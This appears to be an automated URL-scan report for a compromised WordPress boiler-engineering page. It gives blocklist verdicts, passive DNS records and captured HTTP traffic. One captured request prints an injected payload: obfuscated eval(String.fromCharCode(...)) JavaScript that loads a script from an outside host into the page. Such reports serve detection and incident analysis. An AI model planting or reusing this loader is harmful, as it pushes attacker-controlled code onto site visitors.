Overview

URL biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
IP111.221.45.32
ASNNewMedia Express Pte Ltd
Location Singapore
Report completed2022-09-27 06:18:49 UTC
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blocklists

OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Scan Date Severity Indicator Comment
2022-09-27 2 biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/ Malware
2022-09-27 2 biasbd.com/wp-content/themes/industrial/js/owlcarousel/assets/owl.carousel. (...) Malware
2022-09-27 2 biasbd.com/wp-content/themes/industrial/css/pikaday.css?ver=5.2.16 Malware
2022-09-27 2 biasbd.com/wp-content/themes/industrial/css/bootstrap.css?ver=5.2.16 Malware
2022-09-27 2 biasbd.com/wp-content/themes/industrial/css/core.css?ver=5.2.16 Malware
2022-09-27 2 biasbd.com/wp-content/themes/industrial/style.css?ver=5.2.16 Malware
2022-09-27 2 biasbd.com/wp-content/themes/industrial/css/wordpress.css?ver=5.2.16 Malware
2022-09-27 2 biasbd.com/wp-content/themes/industrial/css/components.css?ver=5.2.16 Malware
2022-09-27 2 biasbd.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 Malware
2022-09-27 2 biasbd.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.b (...) Malware
2022-09-27 2 biasbd.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.mi (...) Malware
2022-09-27 2 biasbd.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp Malware
2022-09-27 2 biasbd.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch. (...) Malware
2022-09-27 2 biasbd.com/wp-content/plugins/woocommerce/assets/css/blocks/style.css?ver=3.6.7 Malware
2022-09-27 2 biasbd.com/wp-content/plugins/revslider/public/assets/css/settings.css?ver=5.4.8 Malware
2022-09-27 2 biasbd.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/css (...) Malware
2022-09-27 2 biasbd.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3 Malware
2022-09-27 2 biasbd.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min (...) Malware
2022-09-27 2 biasbd.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.mi (...) Malware
2022-09-27 2 biasbd.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments (...) Malware
2022-09-27 2 biasbd.com/wp-includes/js/dist/vendor/moment.min.js?ver=2.22.2 Malware
2022-09-27 2 biasbd.com/wp-content/themes/industrial/js/jquery.swipebox.js?ver=5.2.16 Malware
2022-09-27 2 biasbd.com/wp-content/themes/industrial/js/bootstrap/bootstrap.min.js?ver=5.2.16 Malware
2022-09-27 2 biasbd.com/wp-content/themes/industrial/js/functions.js?ver=5.2.16 Malware
2022-09-27 2 biasbd.com/wp-content/themes/industrial/js/owlcarousel/owl.carousel.js?ver= (...) Malware
2022-09-27 2 biasbd.com/wp-content/plugins/js_composer/assets/lib/bower/isotope/dist/iso (...) Malware
2022-09-27 2 biasbd.com/wp-content/plugins/js_composer/assets/lib/bower/font-awesome/fon (...) Malware
2022-09-27 2 biasbd.com/wp-content/uploads/2018/12/icon_7Lz_icon.ico Malware
2022-09-27 2 biasbd.com/water-tube-boiler-working-principle-types-of-water-tube-boilers/ Malware
mnemonic secure dns  No alerts detected
Quad9 DNS  No alerts detected


Files

No files detected



Passive DNS (18)

Passive DNS Source Fully Qualifying Domain Name Rank First Seen Last Seen IP Comment
mnemonic passive DNS biasbd.com (46) 0 2019-03-31 12:24:38 UTC 2022-09-25 18:13:34 UTC 111.221.45.32 Unknown ranking
mnemonic passive DNS www.youtube.com (1) 90 2013-05-30 23:21:49 UTC 2022-09-26 04:28:04 UTC 216.58.211.14
mnemonic passive DNS cdn.jsdelivr.net (1) 439 2012-09-30 00:15:09 UTC 2022-09-26 11:58:20 UTC 151.101.85.229
mnemonic passive DNS vsa5.tawk.to (1) 0 2020-03-11 12:03:58 UTC 2022-09-26 13:26:47 UTC 104.22.25.131 Domain (tawk.to) ranked at: 6313
mnemonic passive DNS embed.tawk.to (4) 8650 2014-03-19 21:03:49 UTC 2022-09-26 08:21:59 UTC 172.67.38.66
mnemonic passive DNS firefox.settings.services.mozilla.com (2) 867 2020-05-28 17:26:30 UTC 2022-09-27 05:44:40 UTC 143.204.55.35
mnemonic passive DNS ocsp.digicert.com (1) 86 2012-05-21 07:02:23 UTC 2022-09-27 04:15:00 UTC 93.184.220.29
mnemonic passive DNS www.elprocus.com (8) 517859 2014-01-16 11:51:19 UTC 2022-09-27 04:30:53 UTC 206.189.131.248
mnemonic passive DNS fonts.gstatic.com (3) 0 2014-08-29 13:43:22 UTC 2022-09-26 04:26:58 UTC 142.250.74.163 Domain (gstatic.com) ranked at: 540
mnemonic passive DNS fonts.googleapis.com (2) 8877 2013-06-10 20:14:26 UTC 2022-09-27 01:05:45 UTC 142.250.74.10
mnemonic passive DNS r3.o.lencr.org (6) 344 2020-12-02 08:52:13 UTC 2022-09-27 04:12:16 UTC 23.36.76.226
mnemonic passive DNS content-signature-2.cdn.mozilla.net (1) 1152 2020-11-03 12:26:46 UTC 2022-09-27 04:13:22 UTC 143.204.55.25
mnemonic passive DNS ocsp.pki.goog (10) 175 2017-06-14 07:23:31 UTC 2022-09-27 04:53:14 UTC 142.250.74.3
mnemonic passive DNS static.zotabox.com (2) 26406 2015-04-25 01:24:34 UTC 2022-09-26 23:44:44 UTC 104.22.55.216
mnemonic passive DNS contile.services.mozilla.com (1) 1114 2021-05-27 18:32:35 UTC 2022-09-26 04:28:07 UTC 34.117.237.239
mnemonic passive DNS push.services.mozilla.com (1) 2140 2015-09-03 10:29:36 UTC 2022-09-27 05:14:54 UTC 52.43.253.52
mnemonic passive DNS img-getpocket.cdn.mozilla.net (6) 1631 2017-09-01 03:40:57 UTC 2022-09-27 04:53:17 UTC 34.120.237.76
mnemonic passive DNS ocsp.globalsign.com (1) 2075 2012-05-25 06:20:55 UTC 2022-09-26 04:28:35 UTC 104.18.20.226


Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 111.221.45.32

Date UQ / IDS / BL URL IP
2022-11-24 18:40:24 +0000
0 - 0 - 3 webdisk.dephub-go-id.com/ 111.221.45.32
2022-11-19 22:22:17 +0000
0 - 0 - 4 safaco.my/li/malware.zip 111.221.45.32
2022-11-18 22:59:28 +0000
0 - 0 - 3 safaco.my/li/malware.zip 111.221.45.32
2022-11-18 22:59:15 +0000
0 - 0 - 3 safaco.my/li/malware.zip 111.221.45.32
2022-11-18 16:01:11 +0000
0 - 0 - 5 safaco.my/li/malware.zip 111.221.45.32

Last 5 reports on ASN: NewMedia Express Pte Ltd

Date UQ / IDS / BL URL IP
2022-12-05 23:07:53 +0000
0 - 0 - 2 angelglobe.com/exa/cor6.zip 111.221.45.101
2022-12-04 10:45:59 +0000
0 - 0 - 29 vienyhocdantoc.com.vn/wp-includes/web/1/linklde 103.200.5.94
2022-11-29 20:36:27 +0000
10 - 0 - 16 vienyhocdantoc.com.vn/wp-includes/web/1/linklde 103.200.5.94
2022-11-29 17:49:48 +0000
11 - 0 - 16 vienyhocdantoc.com.vn/wp-includes/web/1/linklde 103.200.5.94
2022-11-29 15:31:54 +0000
12 - 0 - 16 vienyhocdantoc.com.vn/wp-includes/web/1/linklde 103.200.5.94

Last 2 reports on domain: biasbd.com

Date UQ / IDS / BL URL IP
2022-10-04 08:24:06 +0000
0 - 0 - 28 biasbd.com/ssr-on-demands 111.221.45.32
2022-09-27 06:18:49 +0000
0 - 0 - 29 biasbd.com/fire-tube-boiler-working-principle (...) 111.221.45.32

No other reports with similar screenshot



JavaScript

Executed Scripts (52)


Executed Evals (0)


Executed Writes (0)



HTTP Transactions (97)


Request Response
                                        
                                            GET /v1/ HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.35
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length, Backoff, Content-Type, Retry-After, Alert
Cache-Control: max-stale=0
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Tue, 27 Sep 2022 05:37:08 GMT
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 a6d89f7e2d55548b941f1ff5d5b3c8d4.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: JYZC0Zq4_oy0o5VrMN8Bl5pKLrfMptQrd_w2p9X-hOIRVGGuIsf3pw==
Age: 2489


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Size:   939
Md5:    2d12f67fe57a87e7366b662d153a5582
Sha1:   d7b02d81cc74f24a251d9363e0f4b0a149264ec1
Sha256: 73c273c0b5a2de3cb970b8e8c187999d3b55e760dc7766dab4bb76428d19b551
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "4397E6B45B5822FBAB9B83ABE0B96EE70EFBA7CD2160B51936159865EDE5FDB1"
Last-Modified: Sun, 25 Sep 2022 18:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=11677
Expires: Tue, 27 Sep 2022 09:33:14 GMT
Date: Tue, 27 Sep 2022 06:18:37 GMT
Connection: keep-alive

                                        
                                            GET /chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain HTTP/1.1 
Host: content-signature-2.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.25
HTTP/2 200 OK
content-type: binary/octet-stream
                                        
content-length: 5348
date: Mon, 26 Sep 2022 09:17:07 GMT
last-modified: Sat, 10 Sep 2022 18:47:45 GMT
etag: "6113f8408c59aebe188d6af273b90743"
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
x-cache: Hit from cloudfront
via: 1.1 41dc61beb3fe8e8c2c299a2522d8330c.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: yXhiyF8NyplJFG3H6bK2QxIcCuXWSUomu6PVk56wtx2Ee_RQQ0ljqQ==
age: 75692
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PEM certificate\012- , ASCII text
Size:   5348
Md5:    6113f8408c59aebe188d6af273b90743
Sha1:   7398873bf00f99944eaa77ad3ebc0d43c23dba6b
Sha256: b6e0cc9ad68306208a160f3835fb8da76acc5a82d8fde1da5a98e1de1c11a770
                                        
                                            GET /v1/tiles HTTP/1.1 
Host: contile.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.117.237.239
HTTP/2 200 OK
content-type: application/json
                                        
server: nginx
date: Tue, 27 Sep 2022 06:18:38 GMT
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with no line terminators
Size:   12
Md5:    23e88fb7b99543fb33315b29b1fad9d6
Sha1:   a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 27 Sep 2022 06:18:38 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /fire-tube-boiler-working-principle-types-of-fire-tube-boilers/ HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: text/html; charset=UTF-8
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
last-modified: Tue, 27 Sep 2022 06:18:38 GMT
etag: "679089d0192ed0746469287e408c45ca"
transfer-encoding: chunked
content-encoding: gzip
vary: Accept-Encoding
date: Tue, 27 Sep 2022 06:18:38 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (16918), with CRLF, LF line terminators
Size:   25993
Md5:    96525d274ebfb2241b7a012a2e959751
Sha1:   90c858217c9f481a60184dbe892737b0d90980ad
Sha256: d6d2904fb5819c8a565cb8959a3f9ff6af5c1d5d860635e010ec4e1a381def83

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 27 Sep 2022 06:18:38 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /wp-includes/css/dist/block-library/style.min.css?ver=5.2.16 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: text/css
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:38 GMT
last-modified: Thu, 15 Apr 2021 13:19:39 GMT
etag: "7257-60783d6b-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 4780
date: Tue, 27 Sep 2022 06:18:38 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with very long lines (29271), with no line terminators
Size:   4780
Md5:    35b331de30552ae69d5fb5e0770613d8
Sha1:   b2208e9cbf8741e7dea99ac2135c16b6fab04ed1
Sha256: 34eba544a0c7e66ad8abad918878b0e561f43708dfe240513aa4331c81e0c9e4
                                        
                                            GET /%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js HTTP/1.1 
Host: static.zotabox.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://biasbd.com/

                                         
                                         104.22.55.216
HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
                                        
Date: Tue, 27 Sep 2022 06:18:38 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: Zotabox
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST
Content-Security-Policy: default-src 'none'
X-Content-Type-Options: nosniff
Content-Encoding: gzip
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 75121f862d38fab4-OSL


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (2986)
Size:   764
Md5:    e0b278a03f3c0916a366ea6e39a232c7
Sha1:   c383e5fa69a1cf6016560cb0aa9f17be5b699bea
Sha256: 22d617e43c0296250a3e4b524c3672329157563a5b5f065f4f7d0e8b5ea78e40
                                        
                                            GET /wp-content/themes/industrial/js/owlcarousel/assets/owl.carousel.css?ver=5.2.16 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: text/css
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:38 GMT
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "12de-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 1106
date: Tue, 27 Sep 2022 06:18:38 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with CRLF line terminators
Size:   1106
Md5:    d5b8a7aca62b185ed81766afe2345389
Sha1:   f736472969a5e2a9396e5f84be9b50e014c6e213
Sha256: ea1cef87c03af1dc5a2e1e91b9d155ba113a36e1f5ee756c259b0ff978385855

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         142.250.74.3
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Tue, 27 Sep 2022 06:18:38 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 
Host: firefox.settings.services.mozilla.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         143.204.55.35
HTTP/1.1 200 OK
Content-Type: application/json
                                        
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: ETag, Expires, Content-Length, Cache-Control, Pragma, Content-Type, Alert, Backoff, Last-Modified, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Date: Tue, 27 Sep 2022 06:10:46 GMT
Cache-Control: max-age=3600, max-age=3600
Expires: Tue, 27 Sep 2022 06:52:02 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 814e8c24454087e83cd261a6cf477166.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: 1Yv42UNa0jUYrgFcAzopRldDkIH8b0o972nbOHCuM2gAp5fHTymgqg==
Age: 472


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Size:   329
Md5:    0333b0655111aa68de771adfcc4db243
Sha1:   63f295a144ac87a7c8e23417626724eeca68a7eb
Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
                                        
                                            GET /wp-content/themes/industrial/css/pikaday.css?ver=5.2.16 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: text/css
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:38 GMT
last-modified: Fri, 17 Jun 2016 05:12:56 GMT
etag: "c30-576386d8-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 993
date: Tue, 27 Sep 2022 06:18:38 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  Unicode text, UTF-8 text
Size:   993
Md5:    ac09342cd49d1170e62543496577ba97
Sha1:   6b4dd7faea1f5ea969a916693968653b8f86fb41
Sha256: a481ff90cb74de04a621bad6defd5fa18354504ee5f770192170cc0fd8025fb3

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/industrial/css/bootstrap.css?ver=5.2.16 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: text/css
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:38 GMT
last-modified: Fri, 17 Jun 2016 05:12:56 GMT
etag: "10330-576386d8-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 11527
date: Tue, 27 Sep 2022 06:18:38 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text, with very long lines (436)
Size:   11527
Md5:    f8c2609b7304dfba35888623e8f2d469
Sha1:   a38bc6579ed8d4342468797b9e3be82f037226ab
Sha256: 601ab54c2a9091c69b21dfaef6822804e08125a9aeed95c80ff28aa85005ff24

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/industrial/css/core.css?ver=5.2.16 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
                                         111.221.45.32
HTTP/1.1 200 OK
content-type: text/css
                                        
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 27 Sep 2023 06:18:38 GMT
last-modified: Wed, 23 Jan 2019 01:45:38 GMT
etag: "115db-5c47c742-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 12279
date: Tue, 27 Sep 2022 06:18:38 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *


--- Additional Info ---
Magic:  ASCII text
Size:   12279
Md5:    345d2979d981025559480456f9c714b7
Sha1:   06c188114984332ed84c39d3bf49b203bf29cc4f
Sha256: c18022809486759f727ffbeaa668a678e2a07ce986517c5d18d081a853956bd6

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            GET /wp-content/themes/industrial/css/components/button.css?ver=5.2.16 HTTP/1.1 
Host: biasbd.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/fire-tube-boiler-working-principle-types-of-fire-tube-boilers/
Connection: keep-alive

                                         
